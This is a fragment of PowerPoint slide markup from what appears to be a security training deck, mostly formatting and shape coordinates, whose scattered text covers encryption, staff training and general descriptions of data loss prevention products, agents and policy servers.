              <a:rPr dirty="0" sz="2200" spc="-12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44484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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>data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24094" y="6147561"/>
            <a:ext cx="7541259" cy="179958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927100">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-60">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Limits</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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2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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>network</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-114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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>channels</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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that</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-12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intruders</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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can</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-114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use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900">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="260350">
              <a:lnSpc>
                <a:spcPct val="100499"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-65">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Train</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-60">
                <a:solidFill>
                  <a:srgbClr val="44484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1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44484E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55">
                <a:solidFill>
                  <a:srgbClr val="44484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5">
                <a:solidFill>
                  <a:srgbClr val="44484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5">
                <a:solidFill>
                  <a:srgbClr val="44484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75">
                <a:solidFill>
                  <a:srgbClr val="44484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14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on</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-13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30">
                <a:solidFill>
                  <a:srgbClr val="44484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40">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>cu</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-60">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-30">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>en</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="44484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9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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>confidential</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-40">
                <a:solidFill>
                  <a:srgbClr val="44484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45">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>y</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-7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an</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-20">
                <a:solidFill>
                  <a:srgbClr val="44484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14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th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2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44484E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55">
                <a:solidFill>
                  <a:srgbClr val="44484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5">
                <a:solidFill>
                  <a:srgbClr val="44484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1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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>of  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-40">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>encryption</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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44484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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>securely</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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store</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-13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44484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14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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>transmit</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>data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7500" y="4738115"/>
            <a:ext cx="1554479" cy="155448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5700" y="306451"/>
            <a:ext cx="378460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85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Data</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-160">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="135">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Loss</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-155">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="100">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Prevention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44311" y="760476"/>
            <a:ext cx="5184647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257544" y="3779520"/>
            <a:ext cx="3893820" cy="3375660"/>
            <a:chOff x="6257544" y="3779520"/>
            <a:chExt cx="3893820" cy="337566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57544" y="3779520"/>
              <a:ext cx="3893820" cy="337565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65136" y="4985004"/>
              <a:ext cx="1226820" cy="122682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310129" y="1637760"/>
            <a:ext cx="11763375" cy="1816735"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="1898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495"/>
              </a:spcBef>
            </a:pP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DLP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products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scan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files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matched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strings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prevent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unauthorized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copying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transfer.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="3175">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1395"/>
              </a:spcBef>
            </a:pP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component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solutio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e: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00">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="4445">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Ne</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="220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40">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>work</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-12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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>agents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83151" y="6528307"/>
            <a:ext cx="166751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0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Polic</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-40">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>y</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ser</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>v</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>er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538841" y="6528307"/>
            <a:ext cx="214439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35">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Endpoi</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-40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5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9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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>agents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34028" y="7571231"/>
            <a:ext cx="8288020" cy="919480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8288020" h="919479">
                <a:moveTo>
                  <a:pt x="8134350" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="153162" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104753" y="7808"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="62709" y="29553"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29553" y="62709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7808" y="104753"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="153162"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="765810"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7808" y="814223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29553" y="856267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="62709" y="889422"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104753" y="911164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="153162" y="918972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8134350" y="918972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8182758" y="911164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8224802" y="889422"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8257958" y="856267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8279703" y="814223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8287512" y="765810"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8287512" y="153162"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8279703" y="104753"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8257958" y="62709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8224802" y="29553"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8182758" y="7808"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8134350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613275" y="7901127"/>
            <a:ext cx="712597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Cloud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storage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services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also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used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DLP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solutions.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5700" y="306451"/>
            <a:ext cx="378460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85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Data</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-160">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="135">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Loss</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-155">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="100">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Prevention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44311" y="760476"/>
            <a:ext cx="5184647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406896" y="3787140"/>
            <a:ext cx="3531235" cy="3409315"/>
            <a:chOff x="6406896" y="3787140"/>
            <a:chExt cx="3531235" cy="3409315"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6406896" y="3787139"/>
              <a:ext cx="3531235" cy="3409315"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3531234" h="3409315">
                  <a:moveTo>
                    <a:pt x="777240" y="823087"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="572389" y="623316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="537362" y="658888"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="503656" y="695363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="471297" y="732726"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="440270" y="770928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410603" y="809967"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="382308" y="849807"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="355384" y="890422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="329857" y="931773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="305714" y="973836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="282994" y="1016596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="261696" y="1060005"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241820" y="1104049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="223393" y="1148702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206425" y="1193927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190919" y="1239697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176885" y="1286002"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164338" y="1332788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153289" y="1380032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143751" y="1427734"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135737" y="1475828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129247" y="1524304"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124294" y="1573149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120904" y="1622298"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1699895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120904" y="1779270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124294" y="1828241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129247" y="1876907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135737" y="1925269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143751" y="1973262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153289" y="2020887"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164338" y="2068093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176885" y="2114854"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190919" y="2161146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206425" y="2206929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="223393" y="2252192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241820" y="2296884"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="261696" y="2340978"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="282994" y="2384463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="305714" y="2427287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="329857" y="2469413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="355384" y="2510840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="382308" y="2551519"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410603" y="2591422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="440270" y="2630525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="471297" y="2668790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="503656" y="2706179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="537362" y="2742679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="572389" y="2778252"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="777240" y="2576830"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="742289" y="2541308"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="708964" y="2504643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677291" y="2466886"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="647280" y="2428062"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="618959" y="2388235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="592340" y="2347442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="567423" y="2305735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="544258" y="2263140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="522833" y="2219718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="503186" y="2175510"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="485317" y="2130564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="469265" y="2084920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455028" y="2038616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="442633" y="1991702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432104" y="1944217"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="423443" y="1896224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="416674" y="1847748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="411822" y="1798840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="408901" y="1749539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="407924" y="1699895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="408901" y="1650288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="411822" y="1601038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="416674" y="1552206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="423443" y="1503807"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432104" y="1455889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="442633" y="1408493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455028" y="1361681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="469265" y="1315466"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="485317" y="1269898"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="503186" y="1225016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="522833" y="1180871"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="544258" y="1137488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="567423" y="1094917"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="592340" y="1053211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="618959" y="1012393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="647280" y="972502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677291" y="933589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="708964" y="895680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="742289" y="858837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="777240" y="823087"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3531234" h="3409315">
                  <a:moveTo>
                    <a:pt x="2825496" y="2845689"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2622296" y="2644140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2585936" y="2678557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2548471" y="2711348"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2509939" y="2742527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2470366" y="2772067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2429802" y="2799956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2388285" y="2826156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2345855" y="2850667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2302573" y="2873476"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2258453" y="2894558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2213559" y="2913900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2167915" y="2931464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2121573" y="2947263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2074570" y="2961271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2026958" y="2973463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1978761" y="2983827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1930031" y="2992348"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1880819" y="2999003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1831149" y="3003778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1781073" y="3006661"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1730629" y="3007614"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1680146" y="3006661"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1630019" y="3003778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1580286" y="2999003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1530985" y="2992348"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1482178" y="2983827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1433893" y="2973463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1386179" y="2961271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1339100" y="2947263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1292669" y="2931464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1246962" y="2913900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1202004" y="2894558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1157846" y="2873476"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1114526" y="2850667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1072108" y="2826156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1030630" y="2799956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="990117" y="2772067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="950645" y="2742527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="912241" y="2711348"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="874953" y="2678557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="838835" y="2644140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="633984" y="2845689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="670153" y="2880182"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="707275" y="2913367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="745312" y="2945231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="784225" y="2975775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="823988" y="3004985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864565" y="3032836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="905929" y="3059341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="948055" y="3084474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="990904" y="3108236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1034453" y="3130600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1078674" y="3151568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1123518" y="3171126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1168971" y="3189274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1214996" y="3205975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1261567" y="3221240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1308646" y="3235058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1356220" y="3247402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1404226" y="3258286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1452664" y="3267672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1501482" y="3275571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1550657" y="3281972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1600174" y="3286849"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1649984" y="3290189"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1730629" y="3409188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1809496" y="3290189"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1859495" y="3286849"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1909165" y="3281972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1958467" y="3275571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2007400" y="3267672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2055901" y="3258286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2103958" y="3247402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2151545" y="3235058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2198624" y="3221240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2245182" y="3205975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2291181" y="3189274"/>
                  </a:lnTo>
